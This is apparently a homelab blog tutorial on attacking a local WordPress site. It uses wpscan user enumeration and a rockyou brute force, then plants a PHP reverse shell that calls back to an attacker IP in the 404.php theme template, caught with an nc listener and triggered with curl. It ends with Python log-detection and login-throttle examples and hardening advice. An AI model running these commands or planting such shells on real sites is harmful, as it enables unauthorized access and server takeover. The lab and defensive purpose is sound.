When I started writing this article, I didn’t realize how popular and well-documented this attack is in various places. The good news is that protecting yourself from this type of attack is also well-documented. These are my steps to exploit my WordPress site in my homelab.
These instructions are for information purposes only. Do not run the wpscan command against a public WordPress site; you will get caught, because this is a very noisy and visible attack.
This is a simple walkthrough consisting of:
- a WordPress installation
- Kali Linux
Kali Linux comes with wpscan and the default dictionaries pre-installed.
Getting WordPress Usernames
The tool used for this attack is, ironically, WPScan (WordPress Security Scanner), a free vulnerability scanner that lets WordPress site owners test the security of their own sites. One of its more useful features is a built-in password brute-force attack against WordPress logins.
The wpscan user enumeration option retrieves a list of registered WordPress users for the target host. User enumeration is the first step when an attacker wants to gain access to a specific target by brute force. With the --enumerate u option, the tool scans the target's posts, pages, and custom post types for authors and usernames. In our lab environment we use the following command to enumerate the users on our WordPress site:
$ wpscan --url http://192.168.1.244:8082 --enumerate u
The wpscan --enumerate u command runs quickly and generates a few pages of output. We are interested in the User(s) Identified: section. WPScan found two users: fatman and admin.
Congratulations, you just performed user enumeration of your local WordPress site. Write these usernames down as we’ll need them in the next section.
How to Brute Force WordPress Passwords
Now that we have a list of users, we can go through the process of brute-forcing the passwords. Kali provides the mother of all password lists (rockyou.txt) so we’ll use that one for this example. Keep in mind that this is a long list and will take a lot of time to complete.
This is a very visible attack, and most site admins limit repeated login attempts to defeat it.
In addition to the site URL, WPScan takes two further arguments here: the path to the password list (-P) and the username we found in the previous step (-U). The --rua option sends a random User-Agent header with each request. Use the following command to brute force the password for user fatman:
$ wpscan --url http://192.168.1.244:8082 --rua -U fatman -P /usr/share/wordlists/rockyou.txt
If the scan is successful, the results are listed in the Performing password attack on Xmlrpc against 1 user/s section. In this example, the password for user fatman is fatdrunkandstupid.
Now that we have a valid username and password combination, the attack can move to the privilege escalation stage by logging in as a valid user on the WordPress site.
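Both phases above, author enumeration and the xmlrpc.php password attack, are noisy because each leaves a distinctive trail in the web server's access log. The following Python script is an added example, not code from the original post or from WPScan: it parses constructed combined-format log lines and flags an IP that probes several ?author=N IDs (WordPress redirects these to /author/<login>/, which is how the login name leaks), reads the /wp-json/wp/v2/users listing, or posts to xmlrpc.php in a burst. The thresholds, the window, the log lines and the client addresses are constructed for the example (the attacking address reuses the Kali IP from the walkthrough). Because --rua randomizes the User-Agent, the detection deliberately ignores that field.

```python
"""Flag WPScan-style user enumeration and xmlrpc.php password attacks in access logs.

Added example for this walkthrough, not part of the original post or of WPScan.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" / nginx default log format: client IP, timestamp, request line,
# status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
AUTHOR_RE = re.compile(r'^/\?author=(\d+)$')          # author-archive ID probe
REST_USERS_RE = re.compile(r'^/wp-json/wp/v2/users')  # REST users listing

# Thresholds are assumptions for this example; tune them against your own traffic.
AUTHOR_IDS_THRESHOLD = 3               # distinct author IDs probed by one IP
XMLRPC_POSTS_THRESHOLD = 20            # POSTs to xmlrpc.php by one IP ...
XMLRPC_WINDOW = timedelta(seconds=60)  # ... inside any window this long


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(times, window):
    """Largest number of sorted timestamps that fit inside one `window` (two-pointer sweep)."""
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(lines):
    """Return a sorted list of (ip, finding, count) for the noisy behaviours described above.

    The User-Agent is deliberately ignored: wpscan --rua randomizes it.
    """
    author_ids = defaultdict(set)
    rest_users_hits = defaultdict(int)
    xmlrpc_times = defaultdict(list)

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        m = AUTHOR_RE.match(path)
        if m and rec["status"] in (200, 301, 302):
            # The redirect to /author/<login>/ is what leaks the login name.
            author_ids[ip].add(int(m.group(1)))
        elif REST_USERS_RE.match(path) and rec["status"] == 200:
            rest_users_hits[ip] += 1
        elif rec["method"] == "POST" and path.startswith("/xmlrpc.php"):
            xmlrpc_times[ip].append(rec["ts"])

    findings = []
    for ip, ids in author_ids.items():
        if len(ids) >= AUTHOR_IDS_THRESHOLD:
            findings.append((ip, "author-id enumeration", len(ids)))
    for ip, hits in rest_users_hits.items():
        findings.append((ip, "rest users listing", hits))
    for ip, times in xmlrpc_times.items():
        peak = max_in_window(sorted(times), XMLRPC_WINDOW)
        if peak >= XMLRPC_POSTS_THRESHOLD:
            findings.append((ip, "xmlrpc password attack", peak))
    return sorted(findings)


def _line(ip, ts, method, path, status, ua="Mozilla/5.0 (constructed)"):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0 "-" "{ua}"'


# Constructed sample log: the Kali address from the walkthrough sweeps author IDs 1-5,
# reads the REST users listing, then fires 30 xmlrpc POSTs in 30 seconds; a second
# client browses normally and follows a single author link.
SAMPLE_LOG = (
    [_line("192.168.1.6", f"10/Mar/2024:12:00:0{i} +0000", "GET", f"/?author={i}", 301)
     for i in range(1, 6)]
    + [_line("192.168.1.6", "10/Mar/2024:12:00:07 +0000", "GET",
             "/wp-json/wp/v2/users/?per_page=100", 200)]
    + [_line("192.168.1.6", f"10/Mar/2024:12:01:{i:02d} +0000", "POST", "/xmlrpc.php", 200)
       for i in range(30)]
    + [_line("192.168.1.50", "10/Mar/2024:12:00:30 +0000", "GET", "/about/", 200),
       _line("192.168.1.50", "10/Mar/2024:12:00:31 +0000", "GET", "/?author=1", 301)]
)

if __name__ == "__main__":
    for ip, finding, count in detect(SAMPLE_LOG):
        print(f"{ip:15} {finding:25} {count}")
```

Run it as-is to see the three findings for the constructed log, or pass real lines from your access log to detect(). If WordPress sits behind a reverse proxy, the first field is the proxy's address unless the proxy's X-Forwarded-For header has been configured into the log format, so check which field carries the real client before tuning the thresholds.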
Log Into the WordPress Site
Log into the site at https://192.168.1.244:8082/wp-admin to reach the WordPress admin dashboard. Use the username and password from the password cracking attack as your credentials.
For the most part, the attack is complete and it could end here with full access to the admin page.
The next step is to establish a remote shell and perform some privilege escalation.
Establishing a Remote Shell
Pentestmonkey.com is a penetration testing resource site that hosts a repository of reverse shells. We are interested in the PHP reverse shell, which works nicely for this demonstration. Download the reverse shell script from pentestmonkey.com.
Locate the // CHANGE THIS TO ATTACKER IP line and replace the IP address with that of the attacking computer. Do the same for the // CHANGE THIS ATTACKER PORT NUMBER line, setting it to an unused port.
$VERSION = "1.0";
$ip = '192.168.1.6'; // CHANGE THIS TO ATTACKER IP
$port = 1234; // CHANGE THIS ATTACKER PORT NUMBER
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
Now that we have administrative access to the WordPress site, we can install our reverse shell.
Go to the Appearance tab and select the Theme Editor menu.
On the far right, under Theme Files, select 404 Template (404.php).
Replace the contents of this file with the pentestmonkey php-reverse-shell code. Make sure you have changed the IP address and port to those of the Kali Linux machine.
Click the Update File button to save your changes.
Good job, we’re done making WordPress changes and the site is ready for instructions.
Start Listening for a Connection
Kali Linux comes with Netcat installed by default. Pentesters and system administrators alike use Netcat for port listening, port redirection, port checking, network testing, and for our use, creating a reverse shell. In our walkthrough, the attacker’s Kali machine acts as a server that waits for an incoming connection from the WordPress site.
On your Kali machine, use the Netcat (nc) command to start listening for a connection on the port you set in the php-reverse-shell code pasted into the 404.php WordPress template in the previous step.
$ nc -nlvp 1234
After issuing the command, Kali sits and patiently waits for an incoming connection.
Launch the Attack
The attack begins when you load the PHP file containing the pentestmonkey code. You can use a web browser or, better yet, the curl command.
cURL (client URL) is a command-line tool that requests a web resource by its URL; in this case, the 404.php file.
In a new Kali terminal, enter the following command (replacing the IP address and port with those of your WordPress site).
$ curl -v http://192.168.1.244:8082/404.php
The curl command loads the 404.php page on the WordPress server, which now contains the code that opens a shell session to the IP address and port set in the pentestmonkey.com script.
Go back to the terminal window where you started the Netcat listener on your Kali machine.
Congratulations, we have shell access to the WordPress site.
How to Protect Against WordPress User Enumeration Attacks
If you want to avoid WordPress user enumeration attacks, do not use the login username as the nickname and display name, which WordPress shows publicly. The best option is an administrator username made of random characters, combined with a different nickname. WPScan harvests usernames from author URLs, so if the login name never appears there it cannot be scanned by WPScan. Another way to prevent user enumeration is to publish posts and answer replies from a different account than the one used to administer the site.
How to Avoid WordPress Brute Force Attacks
The best way to keep brute-force attackers out is to limit the login attempts per IP address. Several WordPress plug-ins limit the number of login attempts for a specific username and IP; one of them is Wordfence.
The possibility of a successful WPScan exploit is pretty low because the latest WordPress versions limit login attempts by default. Make sure you limit login attempts to a maximum of 3 and increase the lock-out time substantially after 2 lockouts (which is 6 password attempts).
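To make those numbers concrete, here is an added Python example (not code from the original post, from WordPress or from Wordfence) of a per-IP-and-username throttle that locks after 3 failures and lengthens the lockout once 2 lockouts have been issued, together with a simulation that replays one wordlist guess per second for a day. The 20-minute and 24-hour durations are assumptions chosen for the example, the client address and username are taken from the walkthrough, and the never_right function stands in for the real password check.

```python
"""Per-(IP, username) login throttle with escalating lockouts, as the post recommends.

Added example, not part of the original post, WordPress or any plug-in.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional


@dataclass
class _Counter:
    failures: int = 0                      # failures since the last lockout or success
    lockouts: int = 0                      # lockouts issued so far
    locked_until: Optional[datetime] = None


class LoginThrottle:
    """Lock a (client IP, username) pair after `max_failures` bad passwords.

    The first `escalate_after` lockouts last `base_lockout`; every lockout after
    that lasts `escalated_lockout`. The durations are assumptions for the example.
    """

    def __init__(self, max_failures=3, escalate_after=2,
                 base_lockout=timedelta(minutes=20),
                 escalated_lockout=timedelta(hours=24)):
        self.max_failures = max_failures
        self.escalate_after = escalate_after
        self.base_lockout = base_lockout
        self.escalated_lockout = escalated_lockout
        self._counters = {}

    def _counter(self, ip, username):
        return self._counters.setdefault((ip, username.lower()), _Counter())

    def is_locked(self, ip, username, now):
        c = self._counter(ip, username)
        return c.locked_until is not None and now < c.locked_until

    def record_failure(self, ip, username, now):
        """Count a bad password; return True if this failure triggered a lockout."""
        c = self._counter(ip, username)
        c.failures += 1
        if c.failures < self.max_failures:
            return False
        duration = (self.escalated_lockout if c.lockouts >= self.escalate_after
                    else self.base_lockout)
        c.lockouts += 1
        c.failures = 0
        c.locked_until = now + duration
        return True

    def record_success(self, ip, username):
        """A correct password clears the failure counter; the lockout history is kept."""
        c = self._counter(ip, username)
        c.failures = 0
        c.locked_until = None


def flat_throttle(lockout=timedelta(minutes=20)):
    """Throttle whose lockouts never escalate, for comparison."""
    return LoginThrottle(base_lockout=lockout, escalated_lockout=lockout)


def attempt_login(throttle, ip, username, password, now, verify):
    """Return 'locked', 'failed' or 'ok'. `verify` is the real credential check."""
    if throttle.is_locked(ip, username, now):
        return "locked"            # the password is not even evaluated
    if verify(username, password):
        throttle.record_success(ip, username)
        return "ok"
    throttle.record_failure(ip, username, now)
    return "failed"


def never_right(username, password):
    """Constructed stand-in for the real password check: the wordlist never hits."""
    return False


def simulate_wordlist_attack(throttle, seconds, ip="192.168.1.6", username="fatman"):
    """Replay one guess per second for `seconds`; return (guesses evaluated, lockouts)."""
    start = datetime(2024, 3, 10, tzinfo=timezone.utc)
    evaluated = 0
    for i in range(seconds):
        outcome = attempt_login(throttle, ip, username, f"guess{i}",
                                start + timedelta(seconds=i), never_right)
        if outcome == "failed":
            evaluated += 1
    return evaluated, throttle._counter(ip, username).lockouts


if __name__ == "__main__":
    day = 24 * 60 * 60
    print("escalating lockouts:", simulate_wordlist_attack(LoginThrottle(), day))
    print("flat 20-minute lockouts:", simulate_wordlist_attack(flat_throttle(), day))
```

Over a simulated day the escalating policy evaluates only 9 guesses and issues 3 lockouts, because the third lockout lasts the rest of the day; the flat 20-minute policy evaluates 216 guesses across 72 lockouts. Either one reduces a multi-million-entry wordlist to a handful of tries per day, which is why the post calls the odds of a successful WPScan brute force low on a site that throttles logins.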